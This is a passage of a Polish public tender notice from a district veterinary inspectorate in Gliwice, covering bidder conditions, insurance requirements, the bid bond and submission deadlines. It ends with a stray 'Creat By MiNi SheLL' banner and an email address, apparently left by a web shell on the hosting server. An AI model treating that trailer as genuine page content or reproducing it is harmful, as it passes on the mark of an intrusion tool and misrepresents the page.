dotyczące:<br/>1.	Zdolności do występowania w obrocie gospodarczym:<br/> – zamawiający nie dokonuje opisu sposobu oceny spełniania warunku. <br/>2.	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile to wynika z odrębnych przepisów:<br/> – zamawiający nie dokonuje opisu sposobu oceny spełniania warunku.<br/>3.	Sytuacji ekonomicznej lub finansowej:<br/>– wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż 100.000,00 zł. Należy przedłożyć aktualny dokument potwierdzający, iż Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z wykonywaniem robót budowlanych. – dla I części zamówienia. <br/>– wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż 50.000,00 zł. Należy przedłożyć aktualny dokument potwierdzający, iż Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z wykonywaniem robót budowlanych. – dla II części zamówienia. <br/>– wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż 100.000,00 zł. Należy przedłożyć aktualny dokument potwierdzający, iż Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z wykonywaniem robót budowlanych. – dla III części zamówienia. <br/>4.	Zdolności technicznej lub zawodowej:<br/>W celu potwierdzenia spełnienia warunku udziału w postępowaniu Wykonawca wykaże, iż zrealizował: <br/>a)	Dysponuje osobami zdolnymi do wykonania zamówienia: <br/>Zamawiający uzna, że wykonawca spełnia warunek dotyczący osób zdolnych do wykonania zamówienia, jeżeli wykaże, że dysponuje osobami, które będą uczestniczyć w wykonaniu zamówienia, posiadające kwalifikacje zawodowe i doświadczenie niezbędne dla wykonania zamówienia, kopie dokumentów potwierdzające odpowiednie uprawnienia należy załączyć do oferty wraz z wykazem osób:<br/>Osoba posiadająca uprawnienia SEP – wymagane kwalifikacje i doświadczenie zawodowe: <br/> – Osoba ta musi posiadać minimum 3 letnie doświadczenie w instalacjach energetycznych (SEP), porozumiewać się komunikatywnie w języku polskim lub taka komunikacja zostanie zapewniona poprzez tłumacza w trakcie wykonywania prac budowlanych – Dotyczy wyłącznie III części zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 3 do SWZ. dla I,II,III części zmówienia.<br/>b.	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 Ustawy PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. dla I,II,III części zmówienia.<br/>g.	Oświadczamy, o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia, stosownie do art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz. 835) – załącznik nr 5</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">c.	Aktualny dokument potwierdzający, iż wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia. dla I,II,III części zmówienia.<br/>d.	Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrola jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacje o podstawie do dysponowania tymi osobami załącznik nr 4 do SWZ. – Wyłącznie dla III części zamówienia.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Załącznikiem nr 1 – dla I,II,III części Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>a.	oświadczenia, o których mowa w Rozdziale VI pkt 1 – SWZ – załącznik nr 2. <br/>b.	zobowiązanie innego podmiotu, o którym mowa w Rozdziale V pkt II SWZ (jeżeli dotyczy) – załącznik nr 2 a. <br/>c.	oświadczenie podmiotów wspólnie ubiegających się o zamówienie publiczne – załącznik nr 2 b. <br/><br/>d.	dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli dotyczy).<br/>e. dowód wpłaty wadium. <br/>f.	Dowód odbycia wizji lokalnej. <br/>g.	Oświadczamy, iż nie podlegamy wykluczeniu z postępowania o udzielenie zamówienia, stosownie do art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz. 835) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 2.000 zł. <br/><br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 Ustawy PZP.<br/>3.	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>a.	pieniądzu;<br/>b.	gwarancjach bankowych;<br/>c.	gwarancjach ubezpieczeniowych;<br/>d.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustaw} z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4.	Wadium w formie pieniądza należy wnieść przelewem na konto w Narodowym Banku Polskim Oddziale Okręgowym Katowice 47 1010 1212 0058 5813 9120 0000<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego. <br/>5.	Wadium wnoszone w formie poręczeń lub gwarancji musi spełniać co najmniej poniższe wymagania:<br/>a. musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w Ustawy PZP, bez potwierdzania tych okoliczności; <br/>b.	z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium; <br/>c.	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>d.	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>e.	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania; <br/>f.	beneficjentem poręczenia lub gwarancji jest: Powiatowy Inspektorat Weterynarii, ul. Ku Dołom 6, 44-100 Gliwice<br/>g.	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 Ustawy PZP), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj, zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum); <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>2.	Pełnomocnictwo, o którym mowa w pkt 1 musi znajdować się w ofercie.<br/>3.	Oferta wspólna powinna być sporządzona zgodnie z SWZ.<br/>4.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VI pkt 1 oraz Rozdziale VII pkt 2 g SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wskazuje spełnianie warunków udziału w postępowaniu. <br/>5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowalne wykonują poszczególni Wykonawcy. <br/>6.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowe zmiany opisane są umowie załączonej do postępowania <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma Zakupowa OpenNexus</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-17 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wszelkie dokumenty oraz zapytania należy składać wyłącznie poprzez Platformę Zakupową Open NExus z podaniem części której dotyczy wiadomość.

Creat By MiNi SheLL
Email: jattceo@gmail.com